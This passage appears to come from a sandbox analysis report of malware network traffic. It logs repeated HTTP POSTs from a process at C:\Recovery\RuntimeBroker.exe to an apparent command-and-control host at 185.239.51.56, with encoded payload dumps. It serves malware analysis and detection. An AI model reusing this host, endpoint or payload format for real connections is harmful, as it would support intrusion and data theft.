                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:12.987763882 CET2504OUTData Raw: 56 5b 5b 53 5a 5b 5e 51 5f 5a 5a 53 57 5d 56 50 5f 5c 5d 45 51 5d 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[[SZ[^Q_ZZSW]VP_\]EQ]W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$)?*[5#1',-:?'.X(#5*Z470+_%7."^%#[.6
                                                                                                  Jan 1, 2025 02:28:13.339696884 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:13.477030039 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:13 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  82192.168.2.449949185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:13.598387003 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:13.956963062 CET2504OUTData Raw: 56 53 5b 54 5f 5d 5b 50 5f 5a 5a 53 57 58 56 5e 5f 5d 5d 47 51 5d 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VS[T_][P_ZZSWXV^_]]GQ]W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['<,"" Y' ';6Z?4**(%[5-##T'(#2:]9="^%#[."
                                                                                                  Jan 1, 2025 02:28:14.300443888 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:14.308139086 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:14 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  83192.168.2.449955185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:14.428764105 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:14.784682989 CET2504OUTData Raw: 53 5d 5e 55 5a 5a 5b 50 5f 5a 5a 53 57 5c 56 50 5f 54 5d 48 51 56 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^UZZ[P_ZZSW\VP_T]HQVW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<,"6;&3X,)($!*8#%5 8Q%8+27*,="^%#[.2
                                                                                                  Jan 1, 2025 02:28:15.130435944 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:15.137886047 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:15 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  84192.168.2.449961185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:15.279395103 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:15.628359079 CET2504OUTData Raw: 53 5d 5e 57 5f 5d 5b 5d 5f 5a 5a 53 57 5f 56 53 5f 5b 5d 47 51 57 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^W_][]_ZZSW_VS_[]GQWW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?*#"''0';[6Z<9+="&2 ?%; %Q.--"^%#[.>
                                                                                                  Jan 1, 2025 02:28:15.982616901 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:15.990864992 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:15 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  85192.168.2.449968185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:16.114981890 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:16.472605944 CET2504OUTData Raw: 56 5c 5e 52 5a 5b 5b 5d 5f 5a 5a 53 57 5f 56 56 5f 5a 5d 49 51 54 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\^RZ[[]_ZZSW_VV_Z]IQTW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?"#10]2<X/-+&_(;:6#(/P00]%>].="^%#[.>
                                                                                                  Jan 1, 2025 02:28:16.817579985 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:16.970289946 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:16 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  86192.168.2.449975185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:17.234080076 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  87192.168.2.449978185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:17.399774075 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:17.753427982 CET1600OUTData Raw: 53 5e 5e 50 5f 5a 5e 54 5f 5a 5a 53 57 51 56 53 5f 5d 5d 44 51 56 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^P_Z^T_ZZSWQVS_]]DQVWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['?.6"[13'/-*[+$^<1_!-#T'8^&>^.="^%#[.
                                                                                                  Jan 1, 2025 02:28:18.101016045 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:18.243886948 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:17 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  88192.168.2.449980185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:17.521537066 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:17.878329039 CET2504OUTData Raw: 56 53 5e 56 5a 58 5e 50 5f 5a 5a 53 57 58 56 5f 5f 5b 5d 47 51 56 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VS^VZX^P_ZZSWXV__[]GQVWQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<?!"2$]% #;>)+*85_"%*Z#7P';8$7\9="^%#[."
                                                                                                  Jan 1, 2025 02:28:18.223465919 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:18.238297939 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:18 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  89192.168.2.449986185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:18.376595020 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:18.376641035 CET2500OUTData Raw: 53 5d 5b 54 5f 5a 5e 51 5f 5a 5a 53 57 59 56 53 5f 59 5d 44 51 5c 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S][T_Z^Q_ZZSWYVS_Y]DQ\WX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B),>Y!;&U ]8)<2*(X6%4;?Q3;^%>Y,-"^%#[.2
                                                                                                  Jan 1, 2025 02:28:19.099688053 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:19.240170956 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:18 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  90192.168.2.449993185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:19.362690926 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:19.722126007 CET2504OUTData Raw: 56 59 5e 55 5a 5c 5b 52 5f 5a 5a 53 57 5b 56 56 5f 58 5d 46 51 51 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY^UZ\[R_ZZSW[VV_X]FQQWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B(?"62(1U#,<"Y*8*"%&Z#8%(7&7."^%#[..
                                                                                                  Jan 1, 2025 02:28:20.089467049 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:20.101171970 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:19 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  91192.168.2.449999185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:20.223086119 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:20.581513882 CET2504OUTData Raw: 53 5d 5b 57 5f 5a 5b 54 5f 5a 5a 53 57 58 56 51 5f 5b 5d 45 51 5c 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S][W_Z[T_ZZSWXVQ_[]EQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+,&[!]&<X;.=4]?=^5C6Z4327!-="^%#[."
                                                                                                  Jan 1, 2025 02:28:20.932914972 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:21.072700977 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:20 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  92192.168.2.450008185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:21.191092968 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:21.550471067 CET2504OUTData Raw: 56 5a 5b 50 5f 5f 5e 51 5f 5a 5a 53 57 58 56 50 5f 59 5d 42 51 54 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ[P__^Q_ZZSWXVP_Y]BQTW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(<!#2& '/=*[+)<^)^"6>#+<0 %71:"^%#[."
                                                                                                  Jan 1, 2025 02:28:21.927916050 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:21.935971022 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:21 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  93192.168.2.450015185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:22.081624031 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:22.440922976 CET2504OUTData Raw: 56 5e 5e 57 5a 5c 5e 54 5f 5a 5a 53 57 50 56 55 5f 5e 5d 45 51 51 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^WZ\^T_ZZSWPVU_^]EQQW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E<.! Z1$];=]<4%(^)Z6%2[ +0%;;%'-"^%#[.
                                                                                                  Jan 1, 2025 02:28:22.782949924 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:22.790443897 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:22 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  94192.168.2.450021185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:22.908818960 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:23.253355026 CET2504OUTData Raw: 53 5d 5e 57 5f 58 5e 53 5f 5a 5a 53 57 5c 56 50 5f 55 5d 46 51 5d 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^W_X^S_ZZSW\VP_U]FQ]W^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?6_528[1'8>5?4"Y++9Z6&[7('8?$42."^%#[.2


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  95192.168.2.450023185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:23.259126902 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:23.612715006 CET1600OUTData Raw: 53 5e 5e 5f 5f 5d 5e 50 5f 5a 5a 53 57 5a 56 53 5f 5d 5d 49 51 53 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^__]^P_ZZSWZVS_]]IQSWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(25&8\,:]+)?8:657830+7$'.Y9="^%#[.*
                                                                                                  Jan 1, 2025 02:28:23.957118034 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:23.964663029 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:23 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  96192.168.2.450025185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:23.378576994 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
